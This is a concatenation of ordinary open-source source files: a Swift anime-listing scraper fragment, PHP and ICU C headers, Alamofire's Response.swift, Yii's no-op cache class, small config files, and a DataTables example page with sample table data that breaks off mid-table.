            // with the title/link carried by an <a class="latest-parent">.
            let updatedAnimeList = try updatedAnimeContainer
                .select(">div")
                .compactMap {
                    container -> AnimeLink? in
                    if let imageContainer = try container.select("img").first(),
                        let titleContainer = try container.select("a.latest-parent").first() {
                        let animeTitle = titleContainer
                            .ownText()
                            .trimmingCharacters(in: .whitespacesAndNewlines)
                        // Links on the page are relative; resolve against the
                        // source's endpoint URL.
                        let animeUrl = try URL(
                            string: try titleContainer.attr("href"),
                            relativeTo: self.endpointURL
                        ).tryUnwrap()
                        // NOTE(review): artwork is read from "data-src" —
                        // presumably the site lazy-loads images; confirm
                        // against the live markup if parsing breaks.
                        let artworkUrl = try URL(
                            string: try imageContainer.attr("data-src"),
                            relativeTo: self.endpointURL
                        ).tryUnwrap()

                        // Construct and return the url
                        return AnimeLink(
                            title: animeTitle,
                            link: animeUrl,
                            image: artworkUrl,
                            source: self
                        )
                    }
                    return nil
                }

            // Featured entries: nested one level deeper (>div>div), with the
            // title in ".ongoingtitle b" and the link on the first <a>.
            let featuredAnimeList = try featuredAnimeContainer
                .select(">div>div")
                .compactMap {
                    container -> AnimeLink? in
                    if let imageContainer = try container.select("img").first(),
                        let titleContainer = try container.select(".ongoingtitle b").first(),
                        let linkContainer = try container.select("a").first() {
                        let animeTitle = titleContainer
                            .ownText()
                            .trimmingCharacters(in: .whitespacesAndNewlines)
                        let animeUrl = try URL(
                            string: try linkContainer.attr("href"),
                            relativeTo: self.endpointURL
                        ).tryUnwrap()
                        let artworkUrl = try URL(
                            string: try imageContainer.attr("data-src"),
                            relativeTo: self.endpointURL
                        ).tryUnwrap()

                        // Construct and return the url
                        return AnimeLink(
                            title: animeTitle,
                            link: animeUrl,
                            image: artworkUrl,
                            source: self
                        )
                    }
                    return nil
                }

            return BasicFeaturedContainer(
                featured: featuredAnimeList,
                latest: updatedAnimeList
            )
        }
    }
}
{ "pile_set_name": "Github" }
/*
   +----------------------------------------------------------------------+
   | PHP Version 7                                                        |
   +----------------------------------------------------------------------+
   | This source file is subject to version 3.01 of the PHP license,      |
   | that is bundled with this package in the file LICENSE, and is        |
   | available through the world-wide-web at the following url:           |
   | http://www.php.net/license/3_01.txt                                  |
   | If you did not receive a copy of the PHP license and are unable to   |
   | obtain it through the world-wide-web, please send a note to          |
   | [email protected] so we can mail you a copy immediately.               |
   +----------------------------------------------------------------------+
   | Authors: Kirti Velankar <[email protected]>                  |
   +----------------------------------------------------------------------+
*/

/* $Id$ */

#ifndef LOCALE_LOCALE_H
#define LOCALE_LOCALE_H

#include <php.h>

/* Registers the intl Locale constants during module initialization. */
void locale_register_constants( INIT_FUNC_ARGS );

/* Sentinel meaning "no option supplied". */
#define OPTION_DEFAULT NULL

/* Key names for the subtags of a locale identifier
   (used when composing/parsing locale strings). */
#define LOC_LANG_TAG "language"
#define LOC_SCRIPT_TAG "script"
#define LOC_REGION_TAG "region"
#define LOC_VARIANT_TAG "variant"
#define LOC_EXTLANG_TAG "extlang"
#define LOC_GRANDFATHERED_LANG_TAG "grandfathered"
#define LOC_PRIVATE_TAG "private"
#define LOC_CANONICALIZE_TAG "canonicalize"

/* php.ini setting that supplies the default locale for the intl extension. */
#define LOCALE_INI_NAME "intl.default_locale"

#endif // LOCALE_LOCALE_H
{ "pile_set_name": "Github" }
/*
******************************************************************************
*
*   Copyright (C) 1997-2012, International Business Machines
*   Corporation and others.  All Rights Reserved.
*
******************************************************************************
*
* File CSTRING.H
*
* Contains CString interface
*
* @author Helena Shih
*
* Modification History:
*
*   Date        Name        Description
*   6/17/98     hshih       Created.
*  05/03/99     stephen     Changed from functions to macros.
*  06/14/99     stephen     Added icu_strncat, icu_strncmp, icu_tolower
*
******************************************************************************
*/

#ifndef CSTRING_H
#define CSTRING_H 1

#include "unicode/utypes.h"
#include "cmemory.h"
#include <string.h>
#include <stdlib.h>
#include <ctype.h>

/* Thin wrappers over the C library string routines, qualified with
   U_STANDARD_CPP_NAMESPACE so they resolve correctly in C++ builds. */
#define uprv_strcpy(dst, src) U_STANDARD_CPP_NAMESPACE strcpy(dst, src)
#define uprv_strlen(str) U_STANDARD_CPP_NAMESPACE strlen(str)
#define uprv_strcmp(s1, s2) U_STANDARD_CPP_NAMESPACE strcmp(s1, s2)
#define uprv_strcat(dst, src) U_STANDARD_CPP_NAMESPACE strcat(dst, src)
#define uprv_strchr(s, c) U_STANDARD_CPP_NAMESPACE strchr(s, c)
#define uprv_strstr(s, c) U_STANDARD_CPP_NAMESPACE strstr(s, c)
#define uprv_strrchr(s, c) U_STANDARD_CPP_NAMESPACE strrchr(s, c)

#if U_DEBUG
/* Debug builds validate the source pointer(s) with uprv_checkValidMemory
   before delegating to the C library routine. */
#define uprv_strncpy(dst, src, size) ( \
    uprv_checkValidMemory(src, 1), \
    U_STANDARD_CPP_NAMESPACE strncpy(dst, src, size))
#define uprv_strncmp(s1, s2, n) ( \
    uprv_checkValidMemory(s1, 1), \
    uprv_checkValidMemory(s2, 1), \
    U_STANDARD_CPP_NAMESPACE strncmp(s1, s2, n))
#define uprv_strncat(dst, src, n) ( \
    uprv_checkValidMemory(src, 1), \
    U_STANDARD_CPP_NAMESPACE strncat(dst, src, n))
#else
#define uprv_strncpy(dst, src, size) U_STANDARD_CPP_NAMESPACE strncpy(dst, src, size)
#define uprv_strncmp(s1, s2, n) U_STANDARD_CPP_NAMESPACE strncmp(s1, s2, n)
#define uprv_strncat(dst, src, n) U_STANDARD_CPP_NAMESPACE strncat(dst, src, n)
#endif  /* U_DEBUG */

/**
 * Is c an ASCII-repertoire letter a-z or A-Z?
 * Note: The implementation is specific to whether ICU is compiled for
 * an ASCII-based or EBCDIC-based machine. There just does not seem to be a better name for this.
 */
U_CAPI UBool U_EXPORT2
uprv_isASCIILetter(char c);

U_CAPI char U_EXPORT2
uprv_toupper(char c);

U_CAPI char U_EXPORT2
uprv_asciitolower(char c);

U_CAPI char U_EXPORT2
uprv_ebcdictolower(char c);

/* Select the lower-casing implementation matching the build's charset
   family; anything else is a configuration error. */
#if U_CHARSET_FAMILY==U_ASCII_FAMILY
#   define uprv_tolower uprv_asciitolower
#elif U_CHARSET_FAMILY==U_EBCDIC_FAMILY
#   define uprv_tolower uprv_ebcdictolower
#else
#   error U_CHARSET_FAMILY is not valid
#endif

#define uprv_strtod(source, end) U_STANDARD_CPP_NAMESPACE strtod(source, end)
#define uprv_strtoul(str, end, base) U_STANDARD_CPP_NAMESPACE strtoul(str, end, base)
#define uprv_strtol(str, end, base) U_STANDARD_CPP_NAMESPACE strtol(str, end, base)

/* Conversion from a digit to the character with radix base from 2-19 */
/* May need to use U_UPPER_ORDINAL*/
#define T_CString_itosOffset(a) ((a)<=9?('0'+(a)):('A'+(a)-10))

U_CAPI char* U_EXPORT2
uprv_strdup(const char *src);

/**
 * uprv_malloc n+1 bytes, and copy n bytes from src into the new string.
 * Terminate with a null at offset n.   If n is -1, works like uprv_strdup
 * @param src
 * @param n length of the input string, not including null.
 * @return new string (owned by caller, use uprv_free to free).
 * @internal
 */
U_CAPI char* U_EXPORT2
uprv_strndup(const char *src, int32_t n);

U_CAPI char* U_EXPORT2
T_CString_toLowerCase(char* str);

U_CAPI char* U_EXPORT2
T_CString_toUpperCase(char* str);

U_CAPI int32_t U_EXPORT2
T_CString_integerToString(char *buffer, int32_t n, int32_t radix);

U_CAPI int32_t U_EXPORT2
T_CString_int64ToString(char *buffer, int64_t n, uint32_t radix);

U_CAPI int32_t U_EXPORT2
T_CString_stringToInteger(const char *integerString, int32_t radix);

/**
 * Case-insensitive, language-independent string comparison
 * limited to the ASCII character repertoire.
 */
U_CAPI int U_EXPORT2
uprv_stricmp(const char *str1, const char *str2);

/**
 * Case-insensitive, language-independent string comparison
 * limited to the ASCII character repertoire.
 * Compares at most n characters.
 */
U_CAPI int U_EXPORT2
uprv_strnicmp(const char *str1, const char *str2, uint32_t n);

#endif /* ! CSTRING_H */
{ "pile_set_name": "Github" }
//
//  Response.swift
//
//  Copyright (c) 2014-2016 Alamofire Software Foundation (http://alamofire.org/)
//
//  Permission is hereby granted, free of charge, to any person obtaining a copy
//  of this software and associated documentation files (the "Software"), to deal
//  in the Software without restriction, including without limitation the rights
//  to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
//  copies of the Software, and to permit persons to whom the Software is
//  furnished to do so, subject to the following conditions:
//
//  The above copyright notice and this permission notice shall be included in
//  all copies or substantial portions of the Software.
//
//  THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
//  IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
//  FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
//  AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
//  LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
//  OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
//  THE SOFTWARE.
//

import Foundation

/// Used to store all data associated with an non-serialized response of a data or upload request.
public struct DefaultDataResponse {
    /// The URL request sent to the server.
    public let request: URLRequest?

    /// The server's response to the URL request.
    public let response: HTTPURLResponse?

    /// The data returned by the server.
    public let data: Data?

    /// The error encountered while executing or validating the request.
    public let error: Error?

    /// The timeline of the complete lifecycle of the request.
    public let timeline: Timeline

    var _metrics: AnyObject?

    /// Creates a `DefaultDataResponse` instance from the specified parameters.
    ///
    /// - Parameters:
    ///   - request:  The URL request sent to the server.
    ///   - response: The server's response to the URL request.
    ///   - data:     The data returned by the server.
    ///   - error:    The error encountered while executing or validating the request.
    ///   - timeline: The timeline of the complete lifecycle of the request. `Timeline()` by default.
    ///   - metrics:  The task metrics containing the request / response statistics. `nil` by default.
    public init(
        request: URLRequest?,
        response: HTTPURLResponse?,
        data: Data?,
        error: Error?,
        timeline: Timeline = Timeline(),
        metrics: AnyObject? = nil)
    {
        self.request = request
        self.response = response
        self.data = data
        self.error = error
        self.timeline = timeline

        // Fix: the `metrics` argument was previously accepted but never
        // stored, so the public `metrics` accessor always returned nil for
        // responses built through this initializer.
        self._metrics = metrics
    }
}

// MARK: -

/// Used to store all data associated with a serialized response of a data or upload request.
public struct DataResponse<Value> {
    /// The URL request sent to the server.
    public let request: URLRequest?

    /// The server's response to the URL request.
    public let response: HTTPURLResponse?

    /// The data returned by the server.
    public let data: Data?

    /// The result of response serialization.
    public let result: Result<Value>

    /// The timeline of the complete lifecycle of the request.
    public let timeline: Timeline

    /// Returns the associated value of the result if it is a success, `nil` otherwise.
    public var value: Value? { return result.value }

    /// Returns the associated error value if the result if it is a failure, `nil` otherwise.
    public var error: Error? { return result.error }

    var _metrics: AnyObject?

    /// Creates a `DataResponse` instance with the specified parameters derived from response serialization.
    ///
    /// - parameter request:  The URL request sent to the server.
    /// - parameter response: The server's response to the URL request.
    /// - parameter data:     The data returned by the server.
    /// - parameter result:   The result of response serialization.
    /// - parameter timeline: The timeline of the complete lifecycle of the `Request`. Defaults to `Timeline()`.
    ///
    /// - returns: The new `DataResponse` instance.
    public init(
        request: URLRequest?,
        response: HTTPURLResponse?,
        data: Data?,
        result: Result<Value>,
        timeline: Timeline = Timeline())
    {
        self.request = request
        self.response = response
        self.data = data
        self.result = result
        self.timeline = timeline
    }
}

// MARK: -

extension DataResponse: CustomStringConvertible, CustomDebugStringConvertible {
    /// The textual representation used when written to an output stream, which includes whether the result was a
    /// success or failure.
    public var description: String {
        return result.debugDescription
    }

    /// The debug textual representation used when written to an output stream, which includes the URL request, the URL
    /// response, the server data, the response serialization result and the timeline.
    public var debugDescription: String {
        var output: [String] = []

        output.append(request != nil ? "[Request]: \(request!.httpMethod ?? "GET") \(request!)" : "[Request]: nil")
        output.append(response != nil ? "[Response]: \(response!)" : "[Response]: nil")
        output.append("[Data]: \(data?.count ?? 0) bytes")
        output.append("[Result]: \(result.debugDescription)")
        output.append("[Timeline]: \(timeline.debugDescription)")

        return output.joined(separator: "\n")
    }
}

// MARK: -

extension DataResponse {
    /// Evaluates the specified closure when the result of this `DataResponse` is a success, passing the unwrapped
    /// result value as a parameter.
    ///
    /// Use the `map` method with a closure that does not throw. For example:
    ///
    ///     let possibleData: DataResponse<Data> = ...
    ///     let possibleInt = possibleData.map { $0.count }
    ///
    /// - parameter transform: A closure that takes the success value of the instance's result.
    ///
    /// - returns: A `DataResponse` whose result wraps the value returned by the given closure. If this instance's
    ///            result is a failure, returns a response wrapping the same failure.
    public func map<T>(_ transform: (Value) -> T) -> DataResponse<T> {
        var response = DataResponse<T>(
            request: request,
            response: self.response,
            data: data,
            result: result.map(transform),
            timeline: timeline
        )

        response._metrics = _metrics

        return response
    }

    /// Evaluates the given closure when the result of this `DataResponse` is a success, passing the unwrapped result
    /// value as a parameter.
    ///
    /// Use the `flatMap` method with a closure that may throw an error. For example:
    ///
    ///     let possibleData: DataResponse<Data> = ...
    ///     let possibleObject = possibleData.flatMap {
    ///         try JSONSerialization.jsonObject(with: $0)
    ///     }
    ///
    /// - parameter transform: A closure that takes the success value of the instance's result.
    ///
    /// - returns: A success or failure `DataResponse` depending on the result of the given closure. If this instance's
    ///            result is a failure, returns the same failure.
    public func flatMap<T>(_ transform: (Value) throws -> T) -> DataResponse<T> {
        var response = DataResponse<T>(
            request: request,
            response: self.response,
            data: data,
            result: result.flatMap(transform),
            timeline: timeline
        )

        response._metrics = _metrics

        return response
    }
}

// MARK: -

/// Used to store all data associated with an non-serialized response of a download request.
public struct DefaultDownloadResponse {
    /// The URL request sent to the server.
    public let request: URLRequest?

    /// The server's response to the URL request.
    public let response: HTTPURLResponse?

    /// The temporary destination URL of the data returned from the server.
    public let temporaryURL: URL?

    /// The final destination URL of the data returned from the server if it was moved.
    public let destinationURL: URL?

    /// The resume data generated if the request was cancelled.
    public let resumeData: Data?

    /// The error encountered while executing or validating the request.
    public let error: Error?

    /// The timeline of the complete lifecycle of the request.
    public let timeline: Timeline

    var _metrics: AnyObject?

    /// Creates a `DefaultDownloadResponse` instance from the specified parameters.
    ///
    /// - Parameters:
    ///   - request:        The URL request sent to the server.
    ///   - response:       The server's response to the URL request.
    ///   - temporaryURL:   The temporary destination URL of the data returned from the server.
    ///   - destinationURL: The final destination URL of the data returned from the server if it was moved.
    ///   - resumeData:     The resume data generated if the request was cancelled.
    ///   - error:          The error encountered while executing or validating the request.
    ///   - timeline:       The timeline of the complete lifecycle of the request. `Timeline()` by default.
    ///   - metrics:        The task metrics containing the request / response statistics. `nil` by default.
    public init(
        request: URLRequest?,
        response: HTTPURLResponse?,
        temporaryURL: URL?,
        destinationURL: URL?,
        resumeData: Data?,
        error: Error?,
        timeline: Timeline = Timeline(),
        metrics: AnyObject? = nil)
    {
        self.request = request
        self.response = response
        self.temporaryURL = temporaryURL
        self.destinationURL = destinationURL
        self.resumeData = resumeData
        self.error = error
        self.timeline = timeline

        // Fix: same silently-discarded `metrics` defect as in
        // `DefaultDataResponse.init` — store the value so the public
        // `metrics` accessor can surface it.
        self._metrics = metrics
    }
}

// MARK: -

/// Used to store all data associated with a serialized response of a download request.
public struct DownloadResponse<Value> {
    /// The URL request sent to the server.
    public let request: URLRequest?

    /// The server's response to the URL request.
    public let response: HTTPURLResponse?

    /// The temporary destination URL of the data returned from the server.
    public let temporaryURL: URL?

    /// The final destination URL of the data returned from the server if it was moved.
    public let destinationURL: URL?

    /// The resume data generated if the request was cancelled.
    public let resumeData: Data?

    /// The result of response serialization.
    public let result: Result<Value>

    /// The timeline of the complete lifecycle of the request.
    public let timeline: Timeline

    /// Returns the associated value of the result if it is a success, `nil` otherwise.
    public var value: Value? { return result.value }

    /// Returns the associated error value if the result if it is a failure, `nil` otherwise.
    public var error: Error? { return result.error }

    var _metrics: AnyObject?

    /// Creates a `DownloadResponse` instance with the specified parameters derived from response serialization.
    ///
    /// - parameter request:        The URL request sent to the server.
    /// - parameter response:       The server's response to the URL request.
    /// - parameter temporaryURL:   The temporary destination URL of the data returned from the server.
    /// - parameter destinationURL: The final destination URL of the data returned from the server if it was moved.
    /// - parameter resumeData:     The resume data generated if the request was cancelled.
    /// - parameter result:         The result of response serialization.
    /// - parameter timeline:       The timeline of the complete lifecycle of the `Request`. Defaults to `Timeline()`.
    ///
    /// - returns: The new `DownloadResponse` instance.
    public init(
        request: URLRequest?,
        response: HTTPURLResponse?,
        temporaryURL: URL?,
        destinationURL: URL?,
        resumeData: Data?,
        result: Result<Value>,
        timeline: Timeline = Timeline())
    {
        self.request = request
        self.response = response
        self.temporaryURL = temporaryURL
        self.destinationURL = destinationURL
        self.resumeData = resumeData
        self.result = result
        self.timeline = timeline
    }
}

// MARK: -

extension DownloadResponse: CustomStringConvertible, CustomDebugStringConvertible {
    /// The textual representation used when written to an output stream, which includes whether the result was a
    /// success or failure.
    public var description: String {
        return result.debugDescription
    }

    /// The debug textual representation used when written to an output stream, which includes the URL request, the URL
    /// response, the temporary and destination URLs, the resume data, the response serialization result and the
    /// timeline.
    public var debugDescription: String {
        var output: [String] = []

        output.append(request != nil ? "[Request]: \(request!.httpMethod ?? "GET") \(request!)" : "[Request]: nil")
        output.append(response != nil ? "[Response]: \(response!)" : "[Response]: nil")
        output.append("[TemporaryURL]: \(temporaryURL?.path ?? "nil")")
        output.append("[DestinationURL]: \(destinationURL?.path ?? "nil")")
        output.append("[ResumeData]: \(resumeData?.count ?? 0) bytes")
        output.append("[Result]: \(result.debugDescription)")
        output.append("[Timeline]: \(timeline.debugDescription)")

        return output.joined(separator: "\n")
    }
}

// MARK: -

extension DownloadResponse {
    /// Evaluates the given closure when the result of this `DownloadResponse` is a success, passing the unwrapped
    /// result value as a parameter.
    ///
    /// Use the `map` method with a closure that does not throw. For example:
    ///
    ///     let possibleData: DownloadResponse<Data> = ...
    ///     let possibleInt = possibleData.map { $0.count }
    ///
    /// - parameter transform: A closure that takes the success value of the instance's result.
    ///
    /// - returns: A `DownloadResponse` whose result wraps the value returned by the given closure. If this instance's
    ///            result is a failure, returns a response wrapping the same failure.
    public func map<T>(_ transform: (Value) -> T) -> DownloadResponse<T> {
        var response = DownloadResponse<T>(
            request: request,
            response: self.response,
            temporaryURL: temporaryURL,
            destinationURL: destinationURL,
            resumeData: resumeData,
            result: result.map(transform),
            timeline: timeline
        )

        response._metrics = _metrics

        return response
    }

    /// Evaluates the given closure when the result of this `DownloadResponse` is a success, passing the unwrapped
    /// result value as a parameter.
    ///
    /// Use the `flatMap` method with a closure that may throw an error. For example:
    ///
    ///     let possibleData: DownloadResponse<Data> = ...
    ///     let possibleObject = possibleData.flatMap {
    ///         try JSONSerialization.jsonObject(with: $0)
    ///     }
    ///
    /// - parameter transform: A closure that takes the success value of the instance's result.
    ///
    /// - returns: A success or failure `DownloadResponse` depending on the result of the given closure. If this
    ///            instance's result is a failure, returns the same failure.
    public func flatMap<T>(_ transform: (Value) throws -> T) -> DownloadResponse<T> {
        var response = DownloadResponse<T>(
            request: request,
            response: self.response,
            temporaryURL: temporaryURL,
            destinationURL: destinationURL,
            resumeData: resumeData,
            result: result.flatMap(transform),
            timeline: timeline
        )

        response._metrics = _metrics

        return response
    }
}

// MARK: -

protocol Response {
    /// The task metrics containing the request / response statistics.
    var _metrics: AnyObject? { get set }
    mutating func add(_ metrics: AnyObject?)
}

extension Response {
    mutating func add(_ metrics: AnyObject?) {
        #if !os(watchOS)
            guard #available(iOS 10.0, macOS 10.12, tvOS 10.0, *) else { return }
            guard let metrics = metrics as? URLSessionTaskMetrics else { return }

            _metrics = metrics
        #endif
    }
}

// MARK: -

@available(iOS 10.0, macOS 10.12, tvOS 10.0, *)
extension DefaultDataResponse: Response {
#if !os(watchOS)
    /// The task metrics containing the request / response statistics.
    public var metrics: URLSessionTaskMetrics? { return _metrics as? URLSessionTaskMetrics }
#endif
}

@available(iOS 10.0, macOS 10.12, tvOS 10.0, *)
extension DataResponse: Response {
#if !os(watchOS)
    /// The task metrics containing the request / response statistics.
    public var metrics: URLSessionTaskMetrics? { return _metrics as? URLSessionTaskMetrics }
#endif
}

@available(iOS 10.0, macOS 10.12, tvOS 10.0, *)
extension DefaultDownloadResponse: Response {
#if !os(watchOS)
    /// The task metrics containing the request / response statistics.
    public var metrics: URLSessionTaskMetrics? { return _metrics as? URLSessionTaskMetrics }
#endif
}

@available(iOS 10.0, macOS 10.12, tvOS 10.0, *)
extension DownloadResponse: Response {
#if !os(watchOS)
    /// The task metrics containing the request / response statistics.
    public var metrics: URLSessionTaskMetrics? { return _metrics as? URLSessionTaskMetrics }
#endif
}
{ "pile_set_name": "Github" }
fileFormatVersion: 2 guid: 607a5643efb168f429e438f7d6ad270a timeCreated: 1464350149 licenseType: Store ShaderImporter: defaultTextures: [] userData: assetBundleName: assetBundleVariant:
{ "pile_set_name": "Github" }
<?php declare(strict_types=1);

namespace Gos\Bundle\WebSocketBundle\Event;

// Emits a runtime deprecation notice as soon as this class file is loaded;
// the "%s" placeholder is filled with the fully qualified class name passed below.
trigger_deprecation('gos/web-socket-bundle', '3.1', 'The "%s" class is deprecated and will be removed in 4.0, use the symfony/messenger component instead.', PushHandlerFailEvent::class);

/**
 * Marker event class with no behaviour of its own; everything is inherited
 * from {@see PushHandlerEvent}.
 *
 * @deprecated to be removed in 4.0, use the symfony/messenger component instead
 */
final class PushHandlerFailEvent extends PushHandlerEvent
{
}
{ "pile_set_name": "Github" }
recursive-include tests *.py *.sh Dockerfile
{ "pile_set_name": "Github" }
<?php
/**
 * CDummyCache class file.
 *
 * @author Qiang Xue <[email protected]>
 * @link http://www.yiiframework.com/
 * @copyright 2008-2013 Yii Software LLC
 * @license http://www.yiiframework.com/license/
 */

/**
 * CDummyCache is a no-op stand-in for a real cache component.
 *
 * Nothing is ever stored: every read misses and every write is silently
 * accepted. It exists so an application can always configure a 'cache'
 * component and use Yii::app()->cache without null checks; replacing
 * CDummyCache with a real cache component switches the application from
 * non-caching to caching mode with no other code changes.
 *
 * @author Qiang Xue <[email protected]>
 * @package system.caching
 * @since 1.0
 */
class CDummyCache extends CApplicationComponent implements ICache, ArrayAccess
{
	/**
	 * @var string a string prefixed to every cache key so that it is unique. Defaults to {@link CApplication::getId() application ID}.
	 */
	public $keyPrefix;

	/**
	 * Initializes the application component.
	 * Overrides the parent implementation to default the key prefix to the application ID.
	 */
	public function init()
	{
		parent::init();
		if ($this->keyPrefix === null) {
			$this->keyPrefix = Yii::app()->getId();
		}
	}

	/**
	 * Retrieves a value from cache with a specified key.
	 * @param string $id a key identifying the cached value
	 * @return mixed always false: this component never stores anything
	 */
	public function get($id)
	{
		return false;
	}

	/**
	 * Retrieves multiple values from cache with the specified keys.
	 * @param array $ids list of keys identifying the cached values
	 * @return array a (key,value) map over the requested keys, every value false
	 */
	public function mget($ids)
	{
		return array_fill_keys($ids, false);
	}

	/**
	 * Stores a value identified by a key into cache.
	 * The value is discarded; the call only pretends to succeed.
	 * @param string $id the key identifying the value to be cached
	 * @param mixed $value the value to be cached
	 * @param integer $expire the number of seconds in which the cached value will expire. 0 means never expire.
	 * @param ICacheDependency $dependency dependency of the cached item. If the dependency changes, the item is labeled invalid.
	 * @return boolean always true
	 */
	public function set($id, $value, $expire = 0, $dependency = null)
	{
		return true;
	}

	/**
	 * Stores a value identified by a key into cache if the cache does not contain this key.
	 * The value is discarded; the call only pretends to succeed.
	 * @param string $id the key identifying the value to be cached
	 * @param mixed $value the value to be cached
	 * @param integer $expire the number of seconds in which the cached value will expire. 0 means never expire.
	 * @param ICacheDependency $dependency dependency of the cached item. If the dependency changes, the item is labeled invalid.
	 * @return boolean always true
	 */
	public function add($id, $value, $expire = 0, $dependency = null)
	{
		return true;
	}

	/**
	 * Deletes a value with the specified key from cache.
	 * @param string $id the key of the value to be deleted
	 * @return boolean always true
	 */
	public function delete($id)
	{
		return true;
	}

	/**
	 * Deletes all values from cache.
	 * @return boolean always true
	 */
	public function flush()
	{
		return true;
	}

	/**
	 * Returns whether there is a cache entry with a specified key.
	 * This method is required by the interface ArrayAccess.
	 * @param string $id a key identifying the cached value
	 * @return boolean always false
	 */
	public function offsetExists($id)
	{
		return false;
	}

	/**
	 * Retrieves the value from cache with a specified key.
	 * This method is required by the interface ArrayAccess.
	 * @param string $id a key identifying the cached value
	 * @return mixed always false: this component never stores anything
	 */
	public function offsetGet($id)
	{
		return false;
	}

	/**
	 * Stores the value identified by a key into cache.
	 * Intentionally a no-op. This method is required by the interface ArrayAccess.
	 * @param string $id the key identifying the value to be cached
	 * @param mixed $value the value to be cached
	 */
	public function offsetSet($id, $value)
	{
	}

	/**
	 * Deletes the value with the specified key from cache.
	 * Intentionally a no-op. This method is required by the interface ArrayAccess.
	 * @param string $id the key of the value to be deleted
	 */
	public function offsetUnset($id)
	{
	}
}
{ "pile_set_name": "Github" }
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <link rel="shortcut icon" type="image/ico" href="http://www.datatables.net/favicon.ico"> <meta name="viewport" content="initial-scale=1.0, maximum-scale=2.0"> <title>Responsive example - Disable child rows</title> <link rel="stylesheet" type="text/css" href="../../../../media/css/jquery.dataTables.css"> <link rel="stylesheet" type="text/css" href="../../css/dataTables.responsive.css"> <link rel="stylesheet" type="text/css" href="../../../../examples/resources/syntax/shCore.css"> <link rel="stylesheet" type="text/css" href="../../../../examples/resources/demo.css"> <style type="text/css" class="init"> </style> <script type="text/javascript" language="javascript" src="../../../../media/js/jquery.js"></script> <script type="text/javascript" language="javascript" src="../../../../media/js/jquery.dataTables.js"></script> <script type="text/javascript" language="javascript" src="../../js/dataTables.responsive.js"></script> <script type="text/javascript" language="javascript" src="../../../../examples/resources/syntax/shCore.js"></script> <script type="text/javascript" language="javascript" src="../../../../examples/resources/demo.js"></script> <script type="text/javascript" language="javascript" class="init"> $(document).ready(function() { $('#example').DataTable( { responsive: { details: false } } ); } ); </script> </head> <body class="dt-example"> <div class="container"> <section> <h1>Responsive example <span>Disable child rows</span></h1> <div class="info"> <p>By default, when Responsive collapses a table, it will show an option for the end user to expand the row, showing the details of the hidden columns in a child row. This can be disabled using the <a href="//datatables.net/extensions/responsive/reference/option/responsive.details"><code class="option" title= "Responsive initialisation option">responsive.details<span>R</span></code></a> option and setting it to <code>false</code>, as shown in the example below. 
In this case the hidden data is not directly accessible to the end user.</p> </div> <table id="example" class="display nowrap" cellspacing="0" width="100%"> <thead> <tr> <th>First name</th> <th>Last name</th> <th>Position</th> <th>Office</th> <th>Age</th> <th>Start date</th> <th>Salary</th> <th>Extn.</th> <th>E-mail</th> </tr> </thead> <tbody> <tr> <td>Tiger</td> <td>Nixon</td> <td>System Architect</td> <td>Edinburgh</td> <td>61</td> <td>2011/04/25</td> <td>$320,800</td> <td>5421</td> <td>[email protected]</td> </tr> <tr> <td>Garrett</td> <td>Winters</td> <td>Accountant</td> <td>Tokyo</td> <td>63</td> <td>2011/07/25</td> <td>$170,750</td> <td>8422</td> <td>[email protected]</td> </tr> <tr> <td>Ashton</td> <td>Cox</td> <td>Junior Technical Author</td> <td>San Francisco</td> <td>66</td> <td>2009/01/12</td> <td>$86,000</td> <td>1562</td> <td>[email protected]</td> </tr> <tr> <td>Cedric</td> <td>Kelly</td> <td>Senior Javascript Developer</td> <td>Edinburgh</td> <td>22</td> <td>2012/03/29</td> <td>$433,060</td> <td>6224</td> <td>[email protected]</td> </tr> <tr> <td>Airi</td> <td>Satou</td> <td>Accountant</td> <td>Tokyo</td> <td>33</td> <td>2008/11/28</td> <td>$162,700</td> <td>5407</td> <td>[email protected]</td> </tr> <tr> <td>Brielle</td> <td>Williamson</td> <td>Integration Specialist</td> <td>New York</td> <td>61</td> <td>2012/12/02</td> <td>$372,000</td> <td>4804</td> <td>[email protected]</td> </tr> <tr> <td>Herrod</td> <td>Chandler</td> <td>Sales Assistant</td> <td>San Francisco</td> <td>59</td> <td>2012/08/06</td> <td>$137,500</td> <td>9608</td> <td>[email protected]</td> </tr> <tr> <td>Rhona</td> <td>Davidson</td> <td>Integration Specialist</td> <td>Tokyo</td> <td>55</td> <td>2010/10/14</td> <td>$327,900</td> <td>6200</td> <td>[email protected]</td> </tr> <tr> <td>Colleen</td> <td>Hurst</td> <td>Javascript Developer</td> <td>San Francisco</td> <td>39</td> <td>2009/09/15</td> <td>$205,500</td> <td>2360</td> <td>[email protected]</td> </tr> <tr> <td>Sonya</td> 
<td>Frost</td> <td>Software Engineer</td> <td>Edinburgh</td> <td>23</td> <td>2008/12/13</td> <td>$103,600</td> <td>1667</td> <td>[email protected]</td> </tr> <tr> <td>Jena</td> <td>Gaines</td> <td>Office Manager</td> <td>London</td> <td>30</td> <td>2008/12/19</td> <td>$90,560</td> <td>3814</td> <td>[email protected]</td> </tr> <tr> <td>Quinn</td> <td>Flynn</td> <td>Support Lead</td> <td>Edinburgh</td> <td>22</td> <td>2013/03/03</td> <td>$342,000</td> <td>9497</td> <td>[email protected]</td> </tr> <tr> <td>Charde</td> <td>Marshall</td> <td>Regional Director</td> <td>San Francisco</td> <td>36</td> <td>2008/10/16</td> <td>$470,600</td> <td>6741</td> <td>[email protected]</td> </tr> <tr> <td>Haley</td> <td>Kennedy</td> <td>Senior Marketing Designer</td> <td>London</td> <td>43</td> <td>2012/12/18</td> <td>$313,500</td> <td>3597</td> <td>[email protected]</td> </tr> <tr> <td>Tatyana</td> <td>Fitzpatrick</td> <td>Regional Director</td> <td>London</td> <td>19</td> <td>2010/03/17</td> <td>$385,750</td> <td>1965</td> <td>[email protected]</td> </tr> <tr> <td>Michael</td> <td>Silva</td> <td>Marketing Designer</td> <td>London</td> <td>66</td> <td>2012/11/27</td> <td>$198,500</td> <td>1581</td> <td>[email protected]</td> </tr> <tr> 